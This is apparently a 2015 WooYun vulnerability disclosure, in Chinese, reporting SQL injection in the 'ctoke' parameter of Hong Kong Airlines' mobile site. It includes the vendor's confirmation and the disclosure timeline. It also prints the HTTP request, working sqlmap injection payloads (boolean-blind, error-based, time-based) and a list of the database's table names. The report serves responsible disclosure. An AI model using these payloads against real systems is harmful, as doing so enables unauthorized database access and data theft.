乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-19: 细节已通知厂商并且等待厂商处理中 2015-09-21: 厂商已经确认,细节仅向厂商公开 2015-10-01: 细节向核心白帽子及相关领域专家公开 2015-10-11: 细节向普通白帽子公开 2015-10-21: 细节向实习白帽子公开 2015-11-05: 细节向公众公开
http://m.hongkongairlines.com/
POST /ci/index.php/state/analysisnew HTTP/1.1Content-Length: 352Content-Type: application/x-www-form-urlencodedCookie: PHPSESSID=3cbe599d5e98cd18672b5c1e25f7c8cd; mode=PCHost: m.hongkongairlines.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*ctoke=1&language=TW&type=index
ctoke参数
32个库,支持报错型的,来点表数据证明危害吧:
sqlmap resumed the following injection point(s) from stored session:---Parameter: ctoke (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: ctoke=1' RLIKE (SELECT (CASE WHEN (8725=8725) THEN 1 ELSE 0x28 END)) AND 'dupI'='dupI&language=TW&type=index Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: ctoke=1' AND (SELECT 6763 FROM(SELECT COUNT(*),CONCAT(0x71626a7871,(SELECT (ELT(6763=6763,1))),0x71787a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvTj'='xvTj&language=TW&type=index Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: ctoke=1' AND (SELECT * FROM (SELECT(SLEEP(5)))giMO) AND 'Udpu'='Udpu&language=TW&type=index---web application technology: PHP 5.2.13, Apache 2.2.15back-end DBMS: MySQL 5.0Database: aio_umsdata[68 tables]+----------------------------------------+| client_temp || custom_appkey_log || custom_appmap || custom_data || custom_datasurce || custom_event_dim_app || custom_event_label || custom_event_preview || custom_event_table_log || custom_group || custom_item || custom_optimize_logs || custom_standard_channel || razor_alert || razor_alertdetail || razor_cell_towers || razor_channel || razor_channel_product || razor_ci_sessions || razor_clientdata || razor_clientusinglog || razor_config || razor_device || razor_errorlog || razor_event_defination || razor_eventdata || razor_login_attempts || razor_markevent || razor_mccmnc || razor_networktype || razor_persistdata || razor_platform || razor_plugin_hkchannel || razor_product || razor_product_category || razor_product_version || razor_productfiles || razor_provisional_clientdata || razor_provisional_clientusinglog || razor_provisional_errorlog || razor_report_basic_event || razor_report_event_layer || razor_report_expression_event || razor_report_expression_event_resource || razor_report_item || razor_report_multiple_event || razor_report_multiple_event_resource || razor_reportlayout || razor_system_tag || razor_target || razor_targetevent || razor_url_visit_count_time || razor_user2product || razor_user2role || razor_user_autologin || razor_user_count || razor_user_device || razor_user_device_token || razor_user_eventdata || razor_user_permissions || razor_user_profiles || razor_user_resources || razor_user_roles || razor_user_segmentation || razor_user_tag || razor_user_tag_defination || razor_users || razor_wifi_towers |+----------------------------------------+
数据就不去跑了~
危害等级:高
漏洞Rank:13
确认时间:2015-09-21 09:32
谢谢,我们会立即安排整改。
暂无